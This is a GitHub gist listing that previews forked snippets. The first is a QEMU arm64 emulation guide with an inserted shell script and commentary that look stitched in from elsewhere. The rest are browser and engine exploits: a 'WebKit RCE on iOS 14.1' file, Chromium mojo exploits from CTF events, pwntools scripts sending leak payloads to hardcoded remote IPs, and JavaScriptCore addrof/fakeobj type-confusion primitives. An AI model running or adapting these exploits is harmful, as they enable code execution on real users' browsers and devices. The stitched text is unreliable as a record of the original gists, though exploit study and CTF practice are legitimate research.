@AmesianX
AmesianX / arm64.md
Created July 4, 2021 13:46 — forked from george-hawkins/arm64.md
Running virtualized x86_64 and emulated arm64 Ubuntu cloud images using QEMU

QEMU arm64 cloud server emulation

This is basically a rehash of an original post on CNXSoft - all credit (particularly for the Virtio device arguments used below) belongs to the author of that piece.

Download the latest uefi1.img cloud image, e.g. ubuntu-16.04-server-cloudimg-arm64-uefi1.img from https://cloud-images.ubuntu.com/releases/16.04/release/

Download the UEFI firmware image QEMU_EFI.fd from https://releases.linaro.org/components/kernel/uefi-linaro/latest/release/qemu64/

Determine your current username and get your current ssh public key:
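The preview stops before the commands. As an added example, not code from the gist or from the CNXSoft post it credits, the following POSIX shell script carries the procedure through: it renders a NoCloud cloud-init user-data file with the current user's name and SSH public key, builds the seed image with cloud-localds (from cloud-image-utils; that the tool is installed is an assumption), and assembles the qemu-system-aarch64 command line for the uefi1 image and QEMU_EFI.fd. The file names, the 2 vCPU / 2 GiB sizing and host port 2222 are assumptions; the ssh forward is bound to 127.0.0.1 so the emulated guest is reachable from this host only.

```sh
#!/bin/sh
# Added example, not code from the gist or the CNXSoft post it credits.
# Assumptions (not from the page): cloud-localds from cloud-image-utils is
# installed; the image and firmware sit in the working directory under the
# names below; ssh is forwarded to host port 2222.
IMG="${IMG:-ubuntu-16.04-server-cloudimg-arm64-uefi1.img}"
EFI="${EFI:-QEMU_EFI.fd}"
SEED="${SEED:-seed.img}"

# Render NoCloud user-data: one account named after the host user, key-only
# login, no password set, password authentication disabled in sshd.
# $1 = username, $2 = ssh public key (one authorized_keys line)
render_user_data() {
    printf '%s\n' '#cloud-config' \
        'users:' \
        "  - name: $1" \
        '    sudo: ALL=(ALL) NOPASSWD:ALL' \
        '    shell: /bin/bash' \
        '    lock_passwd: true' \
        '    ssh_authorized_keys:' \
        "      - $2" \
        'ssh_pwauth: false'
}

# Write user-data plus a minimal meta-data file and pack them into the seed
# image that cloud-init reads on first boot.
make_seed() {
    render_user_data "$1" "$2" > user-data
    printf 'instance-id: arm64-cloud\nlocal-hostname: arm64-cloud\n' > meta-data
    cloud-localds "$SEED" user-data meta-data
}

# Assemble the emulator command line. Full-system emulation of a Cortex-A57
# (no KVM on an x86_64 host); the virtio-blk/virtio-net devices follow the
# CNXSoft post; guest port 22 is forwarded to 127.0.0.1:2222 only, so the
# guest is not exposed to the network.
qemu_cmd() {
    printf '%s' "qemu-system-aarch64 -M virt -cpu cortex-a57 -smp 2 -m 2048" \
        " -bios $EFI -nographic" \
        " -drive if=none,file=$IMG,id=hd0 -device virtio-blk-device,drive=hd0" \
        " -drive if=none,file=$SEED,id=cloud,format=raw -device virtio-blk-device,drive=cloud" \
        " -netdev user,id=net0,hostfwd=tcp:127.0.0.1:2222-:22 -device virtio-net-device,netdev=net0"
}

main() {
    user="$(id -un)"
    key="$(cat "$HOME/.ssh/id_ed25519.pub" 2>/dev/null || cat "$HOME/.ssh/id_rsa.pub")"
    make_seed "$user" "$key"
    # Paths are assumed to contain no whitespace, so word splitting is safe here.
    eval "$(qemu_cmd)"
}

case "${1:-}" in run) main ;; esac
```

Run it as `sh run-arm64.sh run` with the image and firmware in the working directory, then log in with `ssh -p 2222 "$(id -un)"@127.0.0.1`. Emulated aarch64 on an x86_64 host is slow; the first boot, during which cloud-init applies the seed, can take several minutes.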

@AmesianX
AmesianX / fuck.js
Created July 4, 2021 15:31 — forked from ujin5/fuck.js
WebKit RCE on ios 14.1
// Busy-wait for sleepDuration milliseconds; unlike setTimeout this blocks the JS thread.
function sleep(sleepDuration) {
    var now = new Date().getTime();
    while (new Date().getTime() < now + sleepDuration) { /* do nothing */ }
}
// Pressure the allocator with large ArrayBuffers so the engine runs a GC cycle.
function gc() {
    for (let i = 0; i < 0x10; i++) {
        new ArrayBuffer(0x1000000);
    }
}
let data_view = new DataView(new ArrayBuffer(8));
@AmesianX
AmesianX / exploit.html
Created July 4, 2021 15:31 — forked from ujin5/exploit.html
0CTF/TCTF 2020 Quals Chromium
<script id="worker1">
// The same script body is also loaded as a Worker: in the page (window defined)
// the labeled block is skipped; in the worker it installs the message handler.
worker: {
    if (typeof window === 'object') break worker;
    self.onmessage = function() {
        console.log("onmessage")
    }
}
</script>
<script src="../mojo_bindings.js"></script>
<script src="../third_party/blink/public/mojom/tstorage/tstorage.mojom.js"></script>
@AmesianX
AmesianX / exploit.html
Created July 4, 2021 15:32 — forked from ujin5/exploit.html
2020 Plaid CTF mojo
<html>
<body></body>
<script src="../mojo/public/js/mojo_bindings.js"></script>
<script src="../third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js"></script>
<script src="../third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
<script>
var heap;
var replace_data;
var count = 0;
var blob_registry_ptr = new blink.mojom.BlobRegistryPtr();
@AmesianX
AmesianX / babyllvm.py
Created July 4, 2021 15:33 — forked from ujin5/babyllvm.py
Codegate 2020 Quals
from pwn import *
#s = remote("0", 1234)
s = remote("58.229.240.181", 7777)
context.log_level = "debug"
s.recvuntil(">>>")
s.sendline("+[[."+"<"*0x8+"[.>]"+"<"*(0x6e+0x8)+"[.>]"+">"*(0x10-0x6)+"[,>]"+"<"*(0x6+0x10)+"[,>]"+">"*(0x80-0xe)+",>,<.]]")
base = u64(s.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x201090
print "BASE @ " + hex(base)

from pwn import *
from ctypes import *
def convert(s):
return struct.unpack('<d', s)[0]
#s = process("./pwnme")
s = remote("15.164.131.100",9988)
def r(dat):
s.recvuntil(">")
s.sendline(dat)
@AmesianX
AmesianX / exploit.html
Created July 4, 2021 15:35 — forked from ujin5/exploit.html
Google CTF Quals 2019 Monochromatic
<html>
<pre id='log'></pre>
<script src="mojo_bindings.js"></script>
<script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
<script src="being_creator_interface.mojom.js"></script>
<script src="food_interface.mojom.js"></script>
<script src="dog_interface.mojom.js"></script>
<script src="person_interface.mojom.js"></script>
<script src="cat_interface.mojom.js"></script>
<script>
@AmesianX
AmesianX / gist:0d241e611ed3adac6559c152ffcbb421
Created February 2, 2022 12:42 — forked from totherik/gist:3a4432f26eea1224ceeb
v8 --allow-natives-syntax RuntimeFunctions
Per https://code.google.com/p/v8/codesearch#v8/trunk/src/runtime.cc
%CreateSymbol
%CreatePrivateSymbol
%CreateGlobalPrivateSymbol
%NewSymbolWrapper
%SymbolDescription
%SymbolRegistry
%SymbolIsPrivate
@AmesianX
AmesianX / pepsiPoc.js
Created April 27, 2022 02:20 — forked from pepsipu/pepsiPoc.js
poc provided by Lucas
load("utils.js")
load("int64.js")
function addrof(obj) {
let dateObj = new Date();
dateObj[0] = 1;
let array = new Array(13.37, 13.37)
let triggerChange = false;
Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, {
@AmesianX
AmesianX / wtf.js
Created April 27, 2022 02:20 — forked from physuru/wtf.js
// addrof/fakeobj primitives for qwertyoruiop's jsc bug
var wtf_hack = false, wtf_confuse = null, wtf_obj = {}, wtf_date = new Date();
wtf_date[1] = 1;
Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, {
has: function () {
if (wtf_hack) {
wtf_confuse[0] = wtf_obj;
}
}
});